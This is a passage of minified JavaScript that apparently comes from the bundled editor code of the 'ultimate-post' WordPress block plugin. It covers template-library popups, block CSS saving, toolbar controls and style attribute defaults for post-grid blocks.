"))),!(u&&u.data_fs_suggestion)&&(0,o.createElement)("div",{className:"ultp-fs-comment-input__wrapper"},(0,o.createElement)(r,{__nextHasNoMarginBottom:!0,label:"Enter Suggestion",value:y,className:"ultp-fs-comment-input",onChange:e=>b(e)}),(0,o.createElement)(s,{isPrimary:!0,className:"ultp-fs-comment-btn",onClick:()=>{(()=>{const e=m(t,{type:"ultimate-post/fs-suggestion",attributes:{data_fs_suggestion:y}});l(e)})(),e()}}," ",__("Add Suggestion","ultimate-post")," ")))})):"")}}))},85701:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(86008);l(60448);const{__}=wp.i18n,{parse:i}=wp.blocks,{Fragment:n,useState:r,useEffect:s,useRef:p}=wp.element,c=e=>{const[t,l]=r([]),[c,u]=r({isPopup:e.isShow||!1,starterLists:[],designs:[],starterChildLists:[],starterParentLists:[],reloadId:"",reload:!1,isStarterLists:!0,error:!1,fetching:!1,starterListsFilter:"all",designFilter:"all",current:[],sidebarOpen:!0,templatekitCol:"ultp-templatekit-col3",loading:!1}),[d,m]=r(""),g=["singular","archive","header","footer","404"].includes(ultp_data.archive),y="front_page"==ultp_data.archive,{isPopup:b,isStarterLists:v,starterListsFilter:h,designFilter:f,fetching:k,starterLists:w,designs:x}=c,T=async()=>{u({...c,loading:!0}),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"get_starter_lists_nd_design"}}).then((e=>{if(e.success&&e.data){const t=e.data;if(g||y)u({...c,current:_(JSON.parse(t.starter_lists)),loading:!1,isStarterLists:!1});else{const e=C(JSON.parse(t.design)),l=JSON.parse(t.starter_lists),{parentObj:o,childArr:a}=I(l);u({...c,starterLists:l,designs:e,current:v?l:e,loading:!1,starterChildLists:a,starterParentLists:o})}}}))},_=e=>{const t=[];return e.forEach((e=>{e.templates.forEach((l=>{let o={...l,parentID:e.ID};y?"page"==o.type&&"home_page"==o.home_page&&(o={...o},t.push(o)):"ultp_builder"==o.type&&ultp_data.archive==o.builder_type&&t.push(o)}))})),t},C=e=>{const t=[];for(const l in e)e[l].forEach((e=>{e.category=l,t.push(e)}));return t},E=e=>{27===e.keyCode&&(document.querySelector(".ultp-builder-modal").remove(),u({...c,isPopup:!1}))};s((()=>(L("","","fetchData"),document.addEventListener("keydown",E),T(),()=>document.removeEventListener("keydown",E))),[]);const S=()=>{const e=document.querySelector(".ultp-builder-modal");e.length>0&&e.remove(),u({...c,isPopup:!1})},P=async e=>{u({...c,reload:!0,reloadId:e}),window.fetch("https://ultp.wpxpo.com/wp-json/restapi/v2/single-template",{method:"POST",body:new URLSearchParams("license="+ultp_data.license+"&template_id="+e)}).then((e=>e.text())).then((e=>{(e=JSON.parse(e)).success&&e.rawData?(wp.data.dispatch("core/block-editor").insertBlocks(i(e.rawData)),S(),u({...c,isPopup:!1,reload:!1,reloadId:"",error:!1})):u({...c,error:!0})})).catch((e=>{console.error(e)}))},L=(e,t="",o="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:o}}).then((e=>{e.success&&l(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{}))}))},I=(e,t="")=>{const l=[],o={};return e.forEach(((e,t)=>{l.push(...e.templates),o[e.title]={pro:e.pro||"",live:e.live,ID:e.ID}})),{childArr:l,parentObj:o}},B=v?h:f;return(0,o.createElement)(n,null,b&&(0,o.createElement)("div",{className:"ultp-builder-modal-shadow"},(0,o.createElement)("div",{className:"ultp-popup-wrap"},(0,o.createElement)("div",{className:"ultp-popup-header"},(0,o.createElement)("div",{className:"ultp-popup-filter-title"},(0,o.createElement)("div",{className:"ultp-popup-filter-image-head"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/logo-sm.svg"}),(0,o.createElement)("span",null,__(g?"Builder Library":"Template Kits","ultimate-post"))),!g&&(0,o.createElement)("div",{className:"ultp-popup-filter-nav"},(0,o.createElement)("div",{className:"ultp-popup-tab-title"+(v?" ultp-active":""),onClick:()=>{m(""),u({...c,isStarterLists:!0,starterListsFilter:"all",current:w})}},__("Starter Packs","ultimate-post")),(0,o.createElement)("div",{className:"ultp-popup-tab-title"+(v?"":" ultp-active"),onClick:()=>{m(""),u({...c,isStarterLists:!1,designFilter:"all",current:x})}},__("Premade Patterns","ultimate-post"))),(0,o.createElement)("div",{className:"ultp-popup-filter-sync-close"},(0,o.createElement)("span",{className:"ultp-popup-sync",onClick:()=>(u({...c,fetching:!0}),void wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(T(),u({...c,fetching:!1}))})))},(0,o.createElement)("i",{className:"dashicons dashicons-update-alt"+(k?" rotate":"")}),__("Synchronize","ultimate-post")),(0,o.createElement)("button",{className:"ultp-btn-close",onClick:()=>S(),id:"ultp-btn-close"},(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}))))),(0,o.createElement)(a.Z,{filterValue:B,state:c,setState:u,useState:r,useEffect:s,useRef:p,_changeVal:(e,t)=>{t?ultp_data.active&&P(e):P(e)},splitArchiveData:(e=[],t="")=>e.filter((e=>{const l=t?Array.isArray(e.category)?e?.category?.filter((e=>"all"==t||e.slug==t)):e.category==t:e?.category.filter((e=>["singular","header","footer","404"].includes(ultp_data.archive)?e.slug==ultp_data.archive:!["singular","header","footer","404"].includes(e.slug)));return Array.isArray(l)?l?.length>0&&l:l})),setWListAction:(e,t)=>L(e,t),wishListArr:t,setWishlistArr:l,starterListModule:d,setStarterListModule:m}))))}},34285:(e,t,l)=>{"use strict";l.d(t,{R:()=>n,V:()=>r});var o=l(99838);const a=e=>{const{post_id:t,block_css:l,hasBlocks:o,preview:a,bindCss:i,src:n,fseTempId:r}=e;return"handleBindCss"==i&&(window.bindCssPostX=!0),wp.apiFetch({path:"/ultp/v1/save_block_css",method:"POST",data:{block_css:l,post_id:t,has_block:o||!1,preview:a||!1,src:n,fseTempId:r||""}}).then((e=>{"handleBindCss"==i&&setTimeout((()=>{window.bindCssPostX=!1}),100)}))};function i(e,t={}){const{blocks:l,pId:n,preview:r}=e;return l?.forEach((e=>{const{attributes:l,name:s}=e;"ultimate-post"===s.split("/")[0]&&l.blockId&&(t[n]=(t[n]||"")+(0,o.Kh)(l,s,l.blockId,!0)),e.innerBlocks&&e.innerBlocks.length>0&&i({blocks:e.innerBlocks,pId:n,preview:r},t),-1!=e.name?.indexOf("core/block")?setTimeout((()=>{!function({pId:e,preview:t}){wp.apiFetch({path:"/ultp/v1/get_other_post_content",method:"POST",data:{postId:e}}).then((t=>{if(t.success){const l=t.data?.includes("ultimate-post")?i({blocks:wp.blocks.parse(t.data),pId:e}):{[e]:""};a({post_id:e,block_css:l[e],hasBlocks:!!l[e],preview:!1,src:"wpBlock"}).then((e=>{}))}}))}({pId:l?.ref,preview:r})}),700):"core/template-part"==e.name&&setTimeout((()=>{!function(e){const{slug:t,theme:l,preview:o}=e,n=(wp.data.select("core")?.getEntityRecords("postType","wp_template_part",{per_page:-1})||[]).find((e=>e.id==l+"//"+t)),r=n?.wp_id;wp.apiFetch({path:"/ultp/v1/get_other_post_content",method:"POST",data:{postId:r}}).then((e=>{if(e.success){const t=e.data?.includes("ultimate-post")?i({blocks:wp.blocks.parse(e.data),pId:r}):{[r]:""};a({post_id:r,block_css:t[r],hasBlocks:!!t[r],preview:!1,src:"partCss"}).then((e=>{}))}}))}({slug:l?.slug,theme:l?.theme,preview:r})}),700)})),t}const n=(e={})=>{const{preview:t=!1,handleBindCss:l=!0}=e,o=wp.data.select("core/block-editor").getBlocks(),{getCurrentPostId:n}=wp.data.select("core/editor");let r=n();const s=wp.data.select("core/edit-site"),p=s?.getEditedPostType()||"";if(p){const e=wp.data.select("core");e?.getEntityRecords("postType","wp_template_part",{per_page:-1}),e?.getEntityRecords("postType","wp_template",{per_page:-1});let n="";if("string"==typeof r&&r.includes("//")){n="wp_template"==p?r:"";const t=(e?.getEntityRecords("postType",p,{per_page:-1})||[]).find((e=>e.id==r));r=t?.wp_id}const c=i({blocks:o,pId:r,preview:t});a({post_id:r,block_css:c[r],hasBlocks:!!c[r],preview:t,bindCss:l?"handleBindCss":"",src:"fse_type",fseTempId:n}).then((e=>{}));const u=s?.getPage();if(u?.hasOwnProperty("context")&&u?.context?.postId){const e=u.context.postId,o=i({blocks:wp.data.select("core").getEditedEntityRecord("postType",u.context?.postType,u.context?.postId)?.blocks||[],pId:e,preview:t});a({post_id:e,block_css:o[e],hasBlocks:!!o[e],preview:t,bindCss:l?"handleBindCss":"",src:"fse_pageId"}).then((e=>{}))}}else{const e=i({blocks:o,pId:r,preview:t});a({post_id:r,block_css:e[r],hasBlocks:!!e[r],preview:t,bindCss:l?"handleBindCss":"",src:"all_editor"}).then((e=>{}))}},r=e=>{let t="";const{getBlockAttributes:l}=wp.data.select("core/block-editor");e.forEach((e=>{const a=l(e.id);t+=(0,o.Kh)(a,e.name,a.blockId,!0)})),a({post_id:"ultp-widget",block_css:t,hasBlocks:!!t,preview:!1,src:"widget"}).then((e=>{}))}},92637:(e,t,l)=>{"use strict";l.r(t),l.d(t,{Section:()=>s,Sections:()=>n,SectionsNoTab:()=>r});var o=l(67294);l(87624);const{__}=wp.i18n,{Fragment:a,useState:i}=wp.element,n=e=>{const{children:t,callback:l,classes:n,settingTab:r=!1,setSettingTab:s=(()=>{})}=e,[p,c]=i("setting"==r?"setting":t[0].props.slug);r&&r!=p&&c("setting");const u=(e,l)=>{if(!e)return"";const o=t.findIndex((e=>e?.props?.slug===p)),a=["ultp-section-title"];return e.props.slug===p?a.push("active"):-1!==o&&(l===o-1?(a.push("active-prev"),(2==t.length&&0==l||4==t.length&&1==l)&&a.push("active-prev-sm")):l===o+1&&(a.push("active-next"),(4==t.length&&2==l||2==t.length&&1==l)&&a.push("active-next-sm"))),a.join(" ")};return(0,o.createElement)("div",{className:`ultp-section-tab ${n||""}`},(0,o.createElement)("div",{className:"ultp-section-wrap"},(0,o.createElement)("div",{className:"ultp-section-wrap-inner"},t.map(((e,t)=>e?(0,o.createElement)("div",{key:t,className:u(e,t),onClick:()=>{"setting"!=e.props.slug&&s(""),c(e.props.slug),l&&l({slug:e.props.slug})}},(0,o.createElement)("span",{className:"ultp-section-title-overlay"}),(0,o.createElement)("span",{className:"ultp-section-title-text"},e.props.title)):(0,o.createElement)(a,{key:t}))))),t.map(((e,t)=>(0,o.createElement)("div",{key:t,className:`ultp-section-content ${e?.props?.slug===p?" active":""} ultp-section-group-${e?.props?.slug}`},e))))},r=({children:e})=>(0,o.createElement)("div",{className:"ultp-section-tab ultp-section-without-tab"},e),s=e=>{const{children:t}=e;return(0,o.createElement)(a,null,Array.isArray(t)?t.map((e=>e)):t)}},43581:(e,t,l)=>{"use strict";l.r(t),l.d(t,{default:()=>s});var o=l(67294),a=l(64766),i=l(18958);l(26135);const{__}=wp.i18n,{Modal:n}=wp.components,{useState:r}=wp.element,s=({store:e,prev:t,designLibrary:l=!0})=>{const[s,p]=r(!1),c=()=>p(!1);return(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-ready-design"},(0,o.createElement)("div",null,l&&(0,o.createElement)("button",{className:"ultp-ready-design-btns patterns",onClick:()=>p(!0)},a.ZP.eye,__("Premade Design","ultimate-post")," "),(0,o.createElement)("a",{className:"ultp-ready-design-btns preview",target:"_blank",href:t,rel:"noreferrer"},a.ZP.eye,__("Examples","ultimate-post")))),s&&(0,o.createElement)(n,{isFullScreen:!0,onRequestClose:c},(0,o.createElement)(i.Z,{store:e,closeModal:c})))}},12402:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(64201);const a=({searchQuery:e,setSearchQuery:t,setTemplateModule:l,changeStates:a})=>(0,o.createElement)("div",{className:"ultp-design-search-wrapper"},(0,o.createElement)("input",{type:"search",id:"ultp-design-search-form",className:"ultp-design-search-input",placeholder:"Search for...",value:e,onChange:e=>{t&&t(e.target.value),l&&l(""),a&&a("search",e.target.value)}}))},31760:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(17024),i=l(53049),n=l(64766),r=l(13448),s=l(18958),p=l(87763);l(88106);const{__}=wp.i18n,{useState:c}=wp.element,{BlockControls:u}=wp.blockEditor,{Modal:d,ToolbarGroup:m,Dropdown:g,ToolbarButton:y}=wp.components,b=((0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 200 108"},(0,o.createElement)("path",{d:"M179 54a33 33 0 0 1-65 8l-8-24a54 54 0 1 0-32 66l-8-19a33 33 0 1 1 20-39l8 22a54 54 0 1 0 32-64l8 19a33 33 0 0 1 45 31Z"})),e=>{const{include:t,store:l}=e,[b,v]=c(!1),h=()=>v(!0),f=()=>v(!1);return(0,o.createElement)(u,{className:"ultp-block-toolbar"},t.map(((t,c)=>{if("template"==t.type)return(0,o.createElement)(m,{key:c},(0,o.createElement)(y,{className:"ultp-toolbar-template__btn",onClick:h,label:"Patterns"},(0,o.createElement)("span",{className:"dashicons dashicons-images-alt2"})),b&&(0,o.createElement)(d,{isFullScreen:!0,onRequestClose:f},(0,o.createElement)(s.Z,{store:l,closeModal:f})));if("layout"==t.type)return(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-layout-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)(y,{label:"Layout",onClick:()=>e()},(0,o.createElement)("span",{className:"dashicons dashicons-schedule"})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)(i.Ar,{title:"inline",store:l,block:t.block,options:t.options,col:t.col,data:t}))}));if("layout+adv_style"==t.type){const{layoutData:e,advStyleData:a}=t;return(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-layout-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)(y,{label:"Layout & Advance Style",onClick:()=>e()},(0,o.createElement)("span",{className:"dashicons dashicons-schedule"})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)(i.Ar,{title:"inline",store:l,block:e.block,col:e.col,data:e}),(0,o.createElement)(i.Ar,{title:"inline",store:l,block:a.block,col:a.col,data:a}))}))}return"query"==t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-query-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-query-toolbar__btn"},(0,o.createElement)(y,{label:"Query",className:"ultp-toolbar-add-new",onClick:()=>e()},"Post Sorting")),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},t.taxQuery?(0,o.createElement)(i.$o,{title:"inline",store:l}):(0,o.createElement)(i.lA,{dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:t.exclude,title:"inline",store:l}))})):"grid_align"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(i.lj,{store:l,attrKey:t.key,options:i.M9,label:__("Grid Content Alignment","ultimate-post")})):"dropdown"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(i.lj,{store:l,attrKey:t.key,options:t.options,label:t.label})):"feat_toggle"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{contentClassName:"ultp-custom-toolbar-wrapper",renderToggle:({onToggle:e})=>(0,o.createElement)("span",null,(0,o.createElement)(y,{label:t.label||"Features",icon:t.icon||p.Z.setting,onClick:()=>e()})),renderContent:()=>(0,o.createElement)(i.wI,{exclude:t.exclude,include:t.include,label:t.label,store:l,data:t.data,new:t.new,dep:t.dep,pro:t.pro})})):"grid_spacing"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(r.Z,{buttonContent:i.HT,include:(0,i.i_)({include:t.include,exclude:t.exclude}),store:l,label:__("Grid Spacing","ultimate-post")})):"linkbutton"==t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-link-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(y,{className:"ultp-link-toolbar__btn",name:"link",label:"Link",icon:n.ZP.link,onClick:()=>e()})),renderContent:()=>(0,o.createElement)(a.Z,{onlyLink:t.onlyLink,value:t.value,text:t?.text,label:t.label,store:l,placeholder:t.placeholder,onChange:e=>l.setAttributes({[t.key]:e})})})):"adv_filter"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-query-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-query-toolbar__btn"},(0,o.createElement)(y,{label:__("Settings","ultimate-post"),icon:p.Z.setting,onClick:()=>e()})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)(i.T,{include:i.wK,store:l,initialOpen:!0}))})):"inserter"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(y,{icon:p.Z.add,label:t.label||__("Insert Blocks","ultimate-post"),onClick:()=>{if(null!=wp.data.dispatch("core/editor").setIsInserterOpened)wp.data.dispatch("core/editor").setIsInserterOpened({rootClientId:t.clientId,insertionIndex:99});else{if(null==wp.data.dispatch("core/edit-post").setIsInserterOpened)return!1;wp.data.dispatch("core/edit-post").setIsInserterOpened({rootClientId:t.clientId,insertionIndex:99})}}})):"custom"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-custom-toolbar-wrapper",renderToggle:({onToggle:e})=>(0,o.createElement)("span",null,(0,o.createElement)(y,{label:t.label||"Settings",icon:t.icon||n.ZP.cog_line,onClick:()=>e()})),renderContent:()=>e.children})):void 0})))})},83100:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(82044);const a=(e,t,l,a)=>(0,o.Z)({url:e||null,utmKey:t||null,affiliate:l||null,hash:a||null})},25335:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(64766),i=l(69735);const{__}=wp.i18n,{RichText:n}=wp.blockEditor,r=e=>{const{headingShow:t,headingStyle:l,headingAlign:r,headingURL:s,headingText:p,setAttributes:c,headingBtnText:u,subHeadingShow:d,subHeadingText:m,headingTag:g,dcEnabled:y=!1}=e.props,b=g?`${g}`:"h3",v=e=>{c({headingText:e})};return(0,o.createElement)(o.Fragment,null,t&&(0,o.createElement)("div",{className:`ultp-heading-wrap ultp-heading-${l} ultp-heading-${r}`},s?(0,o.createElement)(b,{className:"ultp-heading-inner"},(0,o.createElement)("a",null,(0,o.createElement)(n,{key:"editable",tagName:"span",placeholder:__("Add Text…","ultimate-post"),onChange:v,value:p,allowedformats:y?["ultimate-post/dynamic-content"]:void 0}))):(0,o.createElement)(b,{className:"ultp-heading-inner"},(0,o.createElement)(n,{key:"editable",tagName:"span",placeholder:__("Add Text…","ultimate-post"),onChange:v,value:p,allowedFormats:(0,i.o6)()&&y?["ultimate-post/dynamic-content"]:void 0})),"style11"==l&&s&&(0,o.createElement)("a",{className:"ultp-heading-btn"},u,a.ZP.rightAngle2),d&&(0,o.createElement)("div",{className:"ultp-sub-heading"},(0,o.createElement)(n,{key:"editable",tagName:"div",className:"ultp-sub-heading-inner",placeholder:__("Add Text…","ultimate-post"),allowedFormats:[],onChange:e=>c({subHeadingText:e}),value:m}))))}},67594:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});const{createBlock:o}=wp.blocks,a=["ultimate-post/post-grid-1","ultimate-post/post-grid-2","ultimate-post/post-grid-3","ultimate-post/post-grid-4","ultimate-post/post-grid-5","ultimate-post/post-grid-6","ultimate-post/post-grid-7"],i={gridBlocks:a,listBlocks:["ultimate-post/post-list-1","ultimate-post/post-list-2","ultimate-post/post-list-3","ultimate-post/post-list-4"]},n=(e="",t="gridBlocks")=>(""!==e?i[t].filter((t=>t!==e)):a).map((e=>({type:"block",blocks:[e],transform:(t,l)=>o(e,{previewImg:`${ultp_data.url}assets/img/preview/${e.split("/")[1].replace(/-/g,"")}.svg`,contentAlign:t.contentAlign,advPaginationEnable:t.advPaginationEnable,advFilterEnable:t.advFilterEnable,metaShow:t.metaShow,metaTypo:t.metaTypo,metaColor:t.metaColor,metaList:t.metaList,excerptColor:t.excerptColor,excerptTypo:t.excerptTypo,excerptShow:t.excerptShow,imgAnimation:t.imgAnimation,catShow:t?.catShow,queryQuick:t.queryQuick,queryType:t.queryType,queryTax:t.queryTax,queryTaxValue:t.queryTaxValue,queryRelation:t.queryRelation,queryOrderBy:t.queryOrderBy,metaKey:t.metaKey,queryOrder:t.queryOrder,queryInclude:t.queryInclude,queryExclude:t.queryExclude,queryAuthor:t.queryAuthor,queryOffset:t.queryOffset,queryExcludeTerm:t.queryExcludeTerm,queryExcludeAuthor:t.queryExcludeAuthor,querySticky:t.querySticky,queryUnique:t.queryUnique,queryPosts:t.queryPosts,queryCustomPosts:t.queryCustomPosts,catBgHoverColor:t.catBgHoverColor,catPadding:t.catPadding,catHoverColor:t.catHoverColor,catRadius:t.catRadius,catBorder:t.catBorder,catBgColor:t.catBgColor,catColor:t.catColor,catTypo:t.catTypo,titleColor:t.titleColor,titleTypo:t.titleTypo,wrapBg:t.wrapBg,wrapOuterPadding:t.wrapOuterPadding},l)})))},20107:(e,t,l)=>{"use strict";function o(e){let t,l,a="";if("string"==typeof e||"number"==typeof e)a+=e;else if("object"==typeof e)if(Array.isArray(e)){const i=e.length;for(t=0;t<i;t++)e[t]&&(l=o(e[t]))&&(a&&(a+=" "),a+=l)}else for(l in e)e[l]&&(a&&(a+=" "),a+=l);return a}function a(){let e,t,l=0,a="",i=arguments.length;for(;l<i;l++)(e=arguments[l])&&(t=o(e))&&(a&&(a+=" "),a+=t);return a}l.d(t,{Z:()=>a})},36557:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={loadingColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-loading .ultp-loading-blocks div { --loading-block-color: {{loadingColor}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper{z-index:{{advanceZindex}};}"}]},wrapBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},wrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},wrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},wrapRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper { border-radius:{{wrapRadius}}; }"}]},wrapHoverBackground:{type:"object",default:{openColor:0,type:"color",color:"#037fff"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover"}]},wrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover"}]},wrapHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover { border-radius:{{wrapHoverRadius}}; }"}]},wrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover"}]},wrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-wrapper { margin:{{wrapMargin}}; }"}]},wrapOuterPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-wrapper { padding:{{wrapOuterPadding}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},35752:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={catShow:{type:"boolean",default:!0},maxTaxonomy:{type:"string",default:"30"},taxonomy:{type:"string",default:"category"},catStyle:{type:"string",default:"classic"},catPosition:{type:"string",default:"aboveTitle"},customCatColor:{type:"boolean",default:!1},seperatorLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customCatColor",condition:"==",value:!0}]}]},onlyCatColor:{type:"boolean",default:!1,style:[{depends:[{key:"customCatColor",condition:"==",value:!0}]}]},catLineWidth:{type:"object",default:{lg:"20"},style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderRight .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:after, \n            {{ULTP}} .ultp-category-borderLeft .ultp-category-in:before { width:{{catLineWidth}}px; }"}]},catLineSpacing:{type:"object",default:{lg:"30"},style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderBoth .ultp-category-in { padding-left: {{catLineSpacing}}px; padding-right: {{catLineSpacing}}px; } \n            {{ULTP}} .ultp-category-borderLeft .ultp-category-in { padding-left: {{catLineSpacing}}px; } \n            {{ULTP}} .ultp-category-borderRight .ultp-category-in { padding-right:{{catLineSpacing}}px; }"}]},catLineColor:{type:"string",default:"#000000",style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderRight .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderLeft .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:after, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:before { background:{{catLineColor}}; }"}]},catLineHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderBoth:hover .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth:hover .ultp-category-in:after, \n            {{ULTP}} .ultp-category-borderLeft:hover .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderRight:hover .ultp-category-in:before { background:{{catLineHoverColor}}; }"}]},catTypo:{type:"object",default:{openTypography:1,size:{lg:11,unit:"px"},height:{lg:15,unit:"px"},spacing:{lg:1,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"catShow",condition:"==",value:!0}],selector:"body {{ULTP}} div.ultp-block-wrapper .ultp-block-items-wrap .ultp-block-item .ultp-category-grid a"}]},catColor:{type:"string",default:"#fff",style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-category-grid a { color:{{catColor}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-category-grid a { color:{{catColor}}; }"}]},catBgColor:{type:"object",default:{openColor:1,type:"color",color:"#000000"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a"}]},catBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a"}]},catRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a { border-radius:{{catRadius}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a { border-radius:{{catRadius}}; }"}]},catHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-category-grid a:hover { color:{{catHoverColor}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-category-grid a:hover { color:{{catHoverColor}}; }"}]},catBgHoverColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a:hover"}]},catHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a:hover"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid 